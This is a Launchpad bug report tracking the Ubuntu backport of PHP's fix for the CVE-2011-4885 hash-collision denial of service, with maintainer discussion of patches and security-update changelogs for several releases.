Please backport the upstream patch to prevent attacks based on hash collisions

Bug #910296 reported by Liu Qishuai on 2011-12-31
310
This bug affects 9 people
Affects Status Importance Assigned to Milestone
php5 (Ubuntu)
Medium
Unassigned
Hardy
Medium
Steve Beattie
Lucid
Medium
Steve Beattie
Maverick
Medium
Steve Beattie
Natty
Medium
Steve Beattie
Oneiric
Medium
Steve Beattie
Precise
Medium
Unassigned

Bug Description

According to CVE-2011-4885: PHP before 5.3.9 computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters.

CVE link: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4885

upstream php changes: http://svn.php.net/viewvc?view=revision&revision=321003

visibility: private → public
visibility: private → public
Changed in php5 (Ubuntu Hardy):
status: New → Confirmed
Changed in php5 (Ubuntu Lucid):
status: New → Confirmed
Changed in php5 (Ubuntu Maverick):
status: New → Confirmed
Changed in php5 (Ubuntu Natty):
status: New → Confirmed
Changed in php5 (Ubuntu Oneiric):
status: New → Confirmed
Changed in php5 (Ubuntu Precise):
status: New → Confirmed
Changed in php5 (Ubuntu Hardy):
importance: Undecided → Medium
Changed in php5 (Ubuntu Lucid):
importance: Undecided → Medium
Changed in php5 (Ubuntu Maverick):
importance: Undecided → Medium
Changed in php5 (Ubuntu Natty):
importance: Undecided → Medium
Changed in php5 (Ubuntu Oneiric):
importance: Undecided → Medium
Changed in php5 (Ubuntu Precise):
importance: Undecided → Medium
Ted Reed (treed) wrote :

You actually need two commits for this fix.

This one is the 5.3 branch commit for the first commit:

http://svn.php.net/viewvc?view=revision&revision=321038

There was a fix to that commit later:

http://svn.php.net/viewvc?view=revision&revision=321335

I've combined both of these patches into one patch that can be applied to 5.3.2-1ubuntu4.11:

https://gist.github.com/1610477

Should just be able to drop it into debian/patches and add it to the end of debian/patches/series.

I'm still confirming if that patch fixes the DoS.

Ted Reed (treed) wrote :

Also, I might bump this up a little higher than medium. This is a verified bug with trivially reproducible DoS capability.

Ted Reed (treed) wrote :

Initial testing shows a crash from the error message there. A version with the error message pulled out seems to be functioning.

There may be additional code from 2.3.9 that the Ubuntu version doesn't have and needs to support the error message.

Geoff Flarity (geoff-flarity) wrote :

This should really be fixed soon. Please up vote it!

BTW, watch out, the fix caused an even worse (remote code execution) bug:

https://bugzilla.redhat.com/show_bug.cgi?id=786686

Steve Beattie (sbeattie) wrote :

Thanks for reporting this; I am currently working on the update to fix this and other open php issues. I'm aware of the introduced vulnerability CVE-2012-0830 that the fix for this issue introduced (Tom Reed's patch above includes the vulnerability). It's addressed upstream by http://svn.php.net/viewvc?view=revision&revision=323007, plus there's an additional memory leak addressed by http://svn.php.net/viewvc?view=revision&revision=323013).

Changed in php5 (Ubuntu Lucid):
assignee: nobody → Steve Beattie (sbeattie)
Changed in php5 (Ubuntu Hardy):
assignee: nobody → Steve Beattie (sbeattie)
Changed in php5 (Ubuntu Natty):
assignee: nobody → Steve Beattie (sbeattie)
Changed in php5 (Ubuntu Maverick):
assignee: nobody → Steve Beattie (sbeattie)
Changed in php5 (Ubuntu Oneiric):
assignee: nobody → Steve Beattie (sbeattie)
Ondřej Surý (ondrej) wrote :

Why not cherry-pick from Debian? (That way you can also check if I haven't missed anything on your radar.)

Launchpad Janitor (janitor) wrote :

This bug was fixed in the package php5 - 5.3.6-13ubuntu3.5

---------------
php5 (5.3.6-13ubuntu3.5) oneiric-security; urgency=low

  * SECURITY UPDATE: memory allocation failure denial of service
    - debian/patches/php5-CVE-2011-4153.patch: check result of
      zend_strdup() and calloc() for failed allocations
    - CVE-2011-4153
  * SECURITY UPDATE: predictable hash collision denial of service
    (LP: #910296)
    - debian/patches/php5-CVE-2011-4885.patch: add max_input_vars
      directive with default limit of 1000
    - ATTENTION: this update changes previous php5 behavior by
      limiting the number of external input variables to 1000.
      This may be increased by adding a "max_input_vars"
      directive to the php.ini configuration file. See
      http://www.php.net/manual/en/info.configuration.php#ini.max-input-vars
      for more information.
    - CVE-2011-4885
  * SECURITY UPDATE: remote code execution vulnerability introduced by
    the fix for CVE-2011-4885 (LP: #925772)
    - debian/patches/php5-CVE-2012-0830.patch: return rather than
      continuing if max_input_vars limit is reached
    - CVE-2012-0830
  * SECURITY UPDATE: XSLT arbitrary file overwrite attack
    - debian/patches/php5-CVE-2012-0057.patch: add xsl.security_prefs
      ini option to define forbidden operations within XSLT stylesheets
    - CVE-2012-0057
  * SECURITY UPDATE: PDORow session denial of service
    - debian/patches/php5-CVE-2012-0788.patch: fail gracefully when
      attempting to serialize PDORow instances
    - CVE-2012-0788
  * SECURITY UPDATE: magic_quotes_gpc remote disable vulnerability
    - debian/patches/php5-CVE-2012-0831.patch: always restore
      magic_quote_gpc on request shutdown
    - CVE-2012-0831
 -- Steve Beattie <email address hidden> Wed, 08 Feb 2012 20:56:28 -0800

Launchpad Janitor (janitor) wrote :

This bug was fixed in the package php5 - 5.3.5-1ubuntu7.6

---------------
php5 (5.3.5-1ubuntu7.6) natty-security; urgency=low

  * SECURITY UPDATE: memory allocation failure denial of service
    - debian/patches/php5-CVE-2011-4153.patch: check result of
      zend_strdup() and calloc() for failed allocations
    - CVE-2011-4153
  * SECURITY UPDATE: predictable hash collision denial of service
    (LP: #910296)
    - debian/patches/php5-CVE-2011-4885.patch: add max_input_vars
      directive with default limit of 1000
    - ATTENTION: this update changes previous php5 behavior by
      limiting the number of external input variables to 1000.
      This may be increased by adding a "max_input_vars"
      directive to the php.ini configuration file. See
      http://www.php.net/manual/en/info.configuration.php#ini.max-input-vars
      for more information.
    - CVE-2011-4885
  * SECURITY UPDATE: remote code execution vulnerability introduced by
    the fix for CVE-2011-4885 (LP: #925772)
    - debian/patches/php5-CVE-2012-0830.patch: return rather than
      continuing if max_input_vars limit is reached
    - CVE-2012-0830
  * SECURITY UPDATE: XSLT arbitrary file overwrite attack
    - debian/patches/php5-CVE-2012-0057.patch: add xsl.security_prefs
      ini option to define forbidden operations within XSLT stylesheets
    - CVE-2012-0057
  * SECURITY UPDATE: PDORow session denial of service
    - debian/patches/php5-CVE-2012-0788.patch: fail gracefully when
      attempting to serialize PDORow instances
    - CVE-2012-0788
  * SECURITY UPDATE: magic_quotes_gpc remote disable vulnerability
    - debian/patches/php5-CVE-2012-0831.patch: always restore
      magic_quote_gpc on request shutdown
    - CVE-2012-0831
 -- Steve Beattie <email address hidden> Wed, 08 Feb 2012 20:58:41 -0800

Launchpad Janitor (janitor) wrote :

This bug was fixed in the package php5 - 5.3.3-1ubuntu9.9

---------------
php5 (5.3.3-1ubuntu9.9) maverick-security; urgency=low

  * SECURITY UPDATE: memory allocation failure denial of service
    - debian/patches/php5-CVE-2011-4153.patch: check result of
      zend_strdup() and calloc() for failed allocations
    - CVE-2011-4153
  * SECURITY UPDATE: predictable hash collision denial of service
    (LP: #910296)
    - debian/patches/php5-CVE-2011-4885.patch: add max_input_vars
      directive with default limit of 1000
    - ATTENTION: this update changes previous php5 behavior by
      limiting the number of external input variables to 1000.
      This may be increased by adding a "max_input_vars"
      directive to the php.ini configuration file. See
      http://www.php.net/manual/en/info.configuration.php#ini.max-input-vars
      for more information.
    - CVE-2011-4885
  * SECURITY UPDATE: remote code execution vulnerability introduced by
    the fix for CVE-2011-4885 (LP: #925772)
    - debian/patches/php5-CVE-2012-0830.patch: return rather than
      continuing if max_input_vars limit is reached
    - CVE-2012-0830
  * SECURITY UPDATE: XSLT arbitrary file overwrite attack
    - debian/patches/php5-CVE-2012-0057.patch: add xsl.security_prefs
      ini option to define forbidden operations within XSLT stylesheets
    - CVE-2012-0057
  * SECURITY UPDATE: PDORow session denial of service
    - debian/patches/php5-CVE-2012-0788.patch: fail gracefully when
      attempting to serialize PDORow instances
    - CVE-2012-0788
  * SECURITY UPDATE: magic_quotes_gpc remote disable vulnerability
    - debian/patches/php5-CVE-2012-0831.patch: always restore
      magic_quote_gpc on request shutdown
    - CVE-2012-0831
 -- Steve Beattie <email address hidden> Wed, 08 Feb 2012 20:59:18 -0800

Changed in php5 (Ubuntu Maverick):
status: Confirmed → Fix Released
Changed in php5 (Ubuntu Natty):
status: Confirmed → Fix Released
Changed in php5 (Ubuntu Oneiric):
status: Confirmed → Fix Released
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package php5 - 5.3.2-1ubuntu4.13

---------------
php5 (5.3.2-1ubuntu4.13) lucid-security; urgency=low

  * SECURITY UPDATE: memory allocation failure denial of service
    - debian/patches/php5-CVE-2011-4153.patch: check result of
      zend_strdup() and calloc() for failed allocations
    - CVE-2011-4153
  * SECURITY UPDATE: predictable hash collision denial of service
    (LP: #910296)
    - debian/patches/php5-CVE-2011-4885.patch: add max_input_vars
      directive with default limit of 1000
    - ATTENTION: this update changes previous php5 behavior by
      limiting the number of external input variables to 1000.
      This may be increased by adding a "max_input_vars"
      directive to the php.ini configuration file. See
      http://www.php.net/manual/en/info.configuration.php#ini.max-input-vars
      for more information.
    - CVE-2011-4885
  * SECURITY UPDATE: remote code execution vulnerability introduced by
    the fix for CVE-2011-4885 (LP: #925772)
    - debian/patches/php5-CVE-2012-0830.patch: return rather than
      continuing if max_input_vars limit is reached
    - CVE-2012-0830
  * SECURITY UPDATE: XSLT arbitrary file overwrite attack
    - debian/patches/php5-CVE-2012-0057.patch: add xsl.security_prefs
      ini option to define forbidden operations within XSLT stylesheets
    - CVE-2012-0057
  * SECURITY UPDATE: PDORow session denial of service
    - debian/patches/php5-CVE-2012-0788.patch: fail gracefully when
      attempting to serialize PDORow instances
    - CVE-2012-0788
  * SECURITY UPDATE: magic_quotes_gpc remote disable vulnerability
    - debian/patches/php5-CVE-2012-0831.patch: always restore
      magic_quote_gpc on request shutdown
    - CVE-2012-0831
  * SECURITY UPDATE: arbitrary files removal via cronjob
    - debian/php5-common.php5.cron.d: take greater care when removing
      session files (overlooked in a previous update).
    - http://git.debian.org/?p=pkg-php%2Fphp.git;a=commitdiff_plain;h=d09fd04ed7bfcf7f008360c6a42025108925df09
    - CVE-2011-0441
 -- Steve Beattie <email address hidden> Wed, 08 Feb 2012 20:55:57 -0800

Changed in php5 (Ubuntu Lucid):
status: Confirmed → Fix Released

According to this issue it is not yet released for Hardy nor Precise, but the announcement for 5.2.4-2ubuntu5.22 says it is: https://launchpad.net/ubuntu/+source/php5/5.2.4-2ubuntu5.22

Was that tracked somewhere else and this issue just needs to be updated?

Related question: I searched for the bug for the remote arbitrary code execution that this fix introduced (PHP 5.3.10, CVE-2012-0830) and couldn't find it

Steve Beattie (sbeattie) wrote :

Yes, this has been fixed in hardy (8.04 LTS); however, I forgot to incorporate the bug number in the changelog entry for the hardy version. You are correct that this issue has not been addressed in precise, yet.

As for CVE-2012-0830, there is no separate bug report; the security team doesn't track all security issues via bug reports due to some inadequacies in launchpad. Issues are tracked publicly in the Ubuntu CVE tracker at http://people.canonical.com/~ubuntu-security/cve/ .

Thanks!

Changed in php5 (Ubuntu Hardy):
status: Confirmed → Fix Released
Steve Beattie (sbeattie) wrote :

This was addressed in precise in the 5.3.10-1ubuntu1 merge, closing.

Changed in php5 (Ubuntu Precise):
status: Confirmed → Fix Released
To post a comment you must log in.
This report contains Public Security information  Edit
Everyone can see this security related information.

Other bug subscribers

Remote bug watches

Bug watches keep track of this bug in other bug trackers.